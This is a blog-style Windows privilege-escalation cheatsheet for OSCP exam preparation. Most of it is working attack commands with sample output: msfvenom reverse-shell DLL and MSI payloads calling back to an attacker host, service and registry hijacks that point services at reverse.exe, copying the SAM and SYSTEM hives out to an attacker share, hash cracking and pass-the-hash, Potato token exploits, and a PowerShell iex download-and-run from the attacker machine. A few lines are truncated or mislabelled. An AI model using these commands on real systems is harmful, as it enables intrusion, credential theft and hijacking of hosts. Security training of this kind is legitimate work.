Windows L33T! — PE Cheatsheet [OSCP Prep]

One of the things that was hard for me to master during my OSCP preparation is privilege escalation. i didn’t know what to look for, where to start or even what to consider as important information in my privilege escalation technique.

For my Linux privilege escalation cheatsheet, please check THIS page.

Initial Enumeration

systeminfo
wmic qfe
wmic logicaldisk get caption,description,providername
whoami /all
net user
findstr /si password *.txt *.config *.ini
sc query windefend
netsh firewall show state
netsh firewall show config

Check for Kernel Exploits

i useally use tools in this step, as it is much easier.

Windows Exploit Suggester

bitsadmin/wesng

On the target:
systeminfo > systeminfo.txt
on kali:
# python wes.py systeminfo.txt -i 'Elevationof Privilege' — exploits-only | less

Windows-Exploit-Suggester

AonCyberLabs/Windows-Exploit-Suggester

root@kali:/opt# git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
root@kali# /opt/Windows-Exploit-Suggester/windows-exploit-suggester.py --update
root@kali# pip install xlrd --upgrade
root@kali# /opt/Windows-Exploit-Suggester/windows-exploit-suggester.py --database 2020-05-13-mssb.xls --systeminfo sysinfo

Pre-compiled Kernel exploits

This very helpful if you usually have errors while compiling — yup me too

SecWiki/windows-kernel-exploits

Check for Service Exploits

• Insecure Service Properties

carlospolop/privilege-escalation-awesome-scripts-suite

Run winPEAS (absoloutly the best tool for win PE) to check for service misconfigurations:

> .\winPEASany.exe quiet servicesinfo

We can confirm id we can restart the service with manually with the help of accesschk.exe:

C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc
RW daclsvc
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_CHANGE_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_START
SERVICE_STOP
READ_CONTROL

Check the current configuration of the service:

> sc qc daclsvc

Check the current status of the service:

> sc query daclsvc

Reconfigure the service to use our reverse shell executable:

> sc config daclsvc binpath=”\”C:\PrivEsc\reverse.exe\””

Start a listener on Kali, and then start the service to trigger the exploit:

> net start daclsvc

• Unquoted Service Path:

Confirm this using sc:

> sc qc unquotedsvc

Use accesschk.exe to check for write permissions:

C:\Users\user>accesschk.exe /accepteula -uwdq “C:\Program Files\Unquoted Path Service\”
accesschk.exe /accepteula -uwdq “C:\Program Files\Unquoted Path Service\”
C:\Program Files\Unquoted Path Service
RW BUILTIN\Users
RW NT SERVICE\TrustedInstaller
RW NT AUTHORITY\SYSTEM
RW BUILTIN\Administrators
C:\Users\user>

C:\Users\user>sc qc unquotedsvc
sc qc unquotedsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: unquotedsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Unquoted Path Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\user>copy C:\Users\user\reverse.exe “C:\Program Files\Unquoted Path Service\Common.exe”
copy C:\Users\user\reverse.exe “C:\Program Files\Unquoted Path Service\Common.exe”
1 file(s) copied.
C:\Users\user>sc qc unquotedsvc
sc qc unquotedsvc
[SC] QueryServiceConfig SUCCESS

• Weak Registry Permissions:

Confirm the issue using PowerShell:

PS> Get-Acl HKLM:\System\CurrentControlSet\Services\regsvc | Format-List

Confirm the issue using accesschk.exe:

> .\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc

Overwrite the ImagePath registry key to point to our reverse shell executable: — or we can add a user in the local admin group

> reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
> net start regsvc

• Insecure Service Executables:

Confirm this with accesschk.exe:

> .\accesschk.exe /accepteula -quvw “C:\Program Files\File Permissions Service\filepermservice.exe”

Copy the reverse shell executable to overwrite the service executable:

> copy /Y C:\PrivEsc\reverse.exe “C:\Program Files\File Permissions Service\filepermservice.exe”
> net start filepermsvc

• DLL Hijacking:

Use winPEAS to enumerate non-Windows services:

> .\winPEASany.exe quiet servicesinfo

The “dllsvc” service is vulnerable to DLL Hijacking. the service runs the dllhijackservice.exe executable. We can confirm this manually:

> sc qc dllsvc

On Kali, generate a reverse shell DLL named hijackme.dll:

# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.11 LPORT=53 -f dll -o hijackme.dll

Start a listener on Kali and then stop/start the service to trigger the exploit:

> net stop dllsvc
> net start dllsvc

Check the Registry

• AutoRuns

winPEASany.exe quiet applicationsinfo

Confirm the issue manually:

> reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

use accesschk.exe to verify the permissions on each one:

> accesschk.exe /accepteula -wvu “C:\Program Files\Autorun Program\program.exe”
> copy /Y C:\PrivEsc\reverse.exe “C:\Program Files\Autorun Program\program.exe”

Start a listener on Kali, and then restart the Windows VM

shutdown /r

• AlwaysInstallElevated

This can be done using Power-up

HarmJ0y/PowerUp

.\winPEASany.exe quiet windowscreds
[+] Checking AlwaysInstallElevated
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!

Verify this manually:

> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Create the exploit in kali:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.11 LPORT=53 -f msi -o reverse.msi

then run the below command in the target:

msiexec /quiet /qn /i C:\PrivEsc\reverse.msi

Then u should return the shell.

Check for Passwords

• Searching the Registry for Passwords

> .\winPEASany.exe quiet filesinfo userinfo

we can use these creds using alot of tools, depends on the machiene and what open ports available

winexe -U 'admin%password123' //192.168.1.1 cmd.exe
winexe -U 'admin%password123' — system //10.10.1.1 cmd.exe

• Saved Creds

>winPEASx64.exe quiet cmd windowscreds

We can confirm the issue manually:

C:\Users\user>cmdkey /list
cmdkey /list
Currently stored credentials:
Target: WindowsLive:target=virtualapp/didlogical
Type: Generic
User: 02nfpgrklkitqatu
Local machine persistence
Target: Domain:interactive=WIN-QBA94KB3IOF\admin
Type: Domain Password
User: WIN-QBA94KB3IOF\admin

We can then use these creds to run commands as the user

runas /savecred /user:admin C:\PrivEsc\reverse.exe

Configuration Files

.\winPEASany.exe quiet cmd searchfast filesinfo

or manually look for files:

> dir /s *pass* == *.config
> findstr /si password *.xml *.ini *.txt

SAM

if we can access the SAM and the SYSTEM files, we can decrypt data:

> copy C:\Windows\Repair\SAM \\192.168.1.11\tools\
> copy C:\Windows\Repair\SYSTEM \\192.168.1.11\tools\

We can use alot of tools to extract the creds from the SAM and system files, one of the tools are Creddump8.

CiscoCXSecurity/creddump7

# git clone https://github.com/Neohapsis/creddump7.git
# python2 creddump7/pwdump.py SYSTEM SAM

Then we can try and decrypt the hashes

hashcat -m 1000 — force a9fdfa038c4b75ebc76dc855dd74f0da /usr/share/wordlists/rockyou.txt

• Passing the Hash

if we cant decrypt ( or lazy) we can try to pass the hash and get command execution.

pth-winexe -U 'admin%aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da' //192.168.1.1 cmd.exe
pth-winexe — system -U 'admin%aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da' //192.168.1.1 cmd.exe

Search for creds

Find all those strings in config files.

dir /s *pass* == *cred* == *vnc* == *.config*

Find all passwords in all files.

findstr /spin "password" *.*

These are common files to find them in. They might be base64-encoded. So look out for that.

c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini

Look for creds in Registry

• VNC

reg query “HKCU\Software\ORL\WinVNC3\Password”

• Windows autologin

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

• SNMP Paramters

reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

• Putty

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

• Search for password in registry

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Check for Token Impersonation

SeImpersonate or SeAssignPrimaryToken

The below link list all tokens, and explain each token what is the privilige you can get.

gtworek/Priv2Admin

• Juicy Potato

ohpe/juicy-potato

C:\PrivEsc\JuicyPotato.exe -l 1337 -p C:\PrivEsc\reverse.exe -t * -c {03ca98d6-ff5d-49b8-abc6–03dd84127020}

Other Juicy Potato realeses:

https://github.com/Kevin-Robertson/Tater

https://github.com/ohpe/juicy-potato/releases

Get a valid CLSID:

ohpe/juicy-potato

or run the GetCLSID.ps1 PowerShell script.

https://raw.gthubusercontent.com/ohpe/juicy-potato/master/CLSID/GetCLSID.ps1

• Rogue Potato

Releases · antonioCoco/RoguePotato

This is an amazing write up by 0xdf explaining this exploit:

sudo socat tcp-listen:135,reuseaddr,fork tcp:<win-ip>:9999

> C:\PrivEsc\RoguePotato.exe -r 192.168.1.11 –l 9999 -e “C:\PrivEsc\reverse.exe”

• PrintSpoofer

itm4n/PrintSpoofer

> C:\PrivEsc\PrintSpoofer.exe –i -c “C:\PrivEsc\

Check for Scheduled Tasks

schtasks /query /fo LIST /v

Using PowerShell:

PS> Get-ScheduledTask | where {$_.TaskPath -notlike “\Microsoft*”} | ft TaskName,TaskPath,State

• Startup Apps

accesschk.exe /accepteula -d “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp”

Then we can create a file comtaining the exploit:

Set oWS = WScript.CreateObject(“WScript.Shell”)
sLinkFile = “C:\ProgramData\Microsoft\Windows\Start
Menu\Programs\StartUp\reverse.lnk”
Set oLink = oWS.CreateShortcut(sLinkFile)
oLink.TargetPath = “C:\PrivEsc\reverse.exe”
oLink.Save

and then we need to run the below command. where CreateShortcut.vbs is our exploit we created

cscript CreateShortcut.vbs

Other Checks

• Insecure GUI Apps (Citrix Method)

tasklist /V | findstr mspaint.exe

In the navigation input, replace the contents with:

file://c:/windows/system32/cmd.exe

• Installed Applications

> tasklist /v
> .\seatbelt.exe NonstandardProcesses
> .\winPEASany.exe quiet procesinfo

• Hot Potato

Windows 7, 8, early versions of Windows 10

.\potato.exe -ip 192.168.1.1 -cmd “C:\PrivEsc\reverse.exe” -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true

• Port forwarding

we can use plink.exe

> plink.exe <user>@<kali> -R <kaliport>:<target-IP>:<target-port>
> plink.exe root@192.168.1.11 -R 445:127.0.0.1:445

Windows Subsystem for Linux (WSL)

wsl whoami
./ubuntun1604.exe config — default-user root

Check for bash.exe:

wsl python -c ‘BIND_OR_REVERSE_SHELL_PYTHON_CODE’
C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[…]\bash.exe
C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\

TeamViewer_Service.exe

This exploit very well explained by 0xdf in his blog

PS C:\> tasklist
…[snip]…
TeamViewer_Service.exe 3108 0 18,392 K
…[snip]…

Automated tools:

You can always search your fav tool, make sure it is always updated and maintained in github:

PowerUp

https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1

• Sherlock

rasta-mouse/Sherlock

Other usefall commands

• Enable RDP

net localgroup administrators <username> /add

• Transfer Files — using smbserver.py from impacket

root@kali# smbserver.py share . -smb2support -username df -password df

Run the below commands on windows:

> net use \\<kali-ip>\share /u:df df
> copy <file-you-want-to-send-to-kali> \\<kali-ip>\share\
> copy \\<kali-ip>\share\<file-you-want-to-get-from-kali> .

or you can use Invoke-WebRequest:

Invoke-WebRequest http://<kali-ip>/winPEASx64.exe -OutFile winPEASx64.exe

uaing powershell:

Powershell iex (New-Object System.Net.WebClient).DownloadString(‘https://<kali-ip>/shell.ps1')

Or using certutil — i found this VERY handy if i dont have a fully interactive shell, and i cannot run Powershell

certutil -urlcache -f http://<kali-ip>/PowerUp.ps1 powerup.ps1

Finally, previlige escilation is one of most cretical modules in OSCP, and its very important to practice the above techniqes and understands what to expect and what to look for in the output of the above commands.

Some refrences and courses that really helped:

Windows Privilege Escalation for OSCP & Beyond

Windows Privilege Escalation for Beginners

PayloadsAllTheThings — Windows - Privilege Escalation

sushant747 — Privilege Escalation Windows

2018-01-26-Windows-Privilege-Escalation-Guide

Fuzzysecurity

Book.hacktricks-checklist-windows-privilege-escalation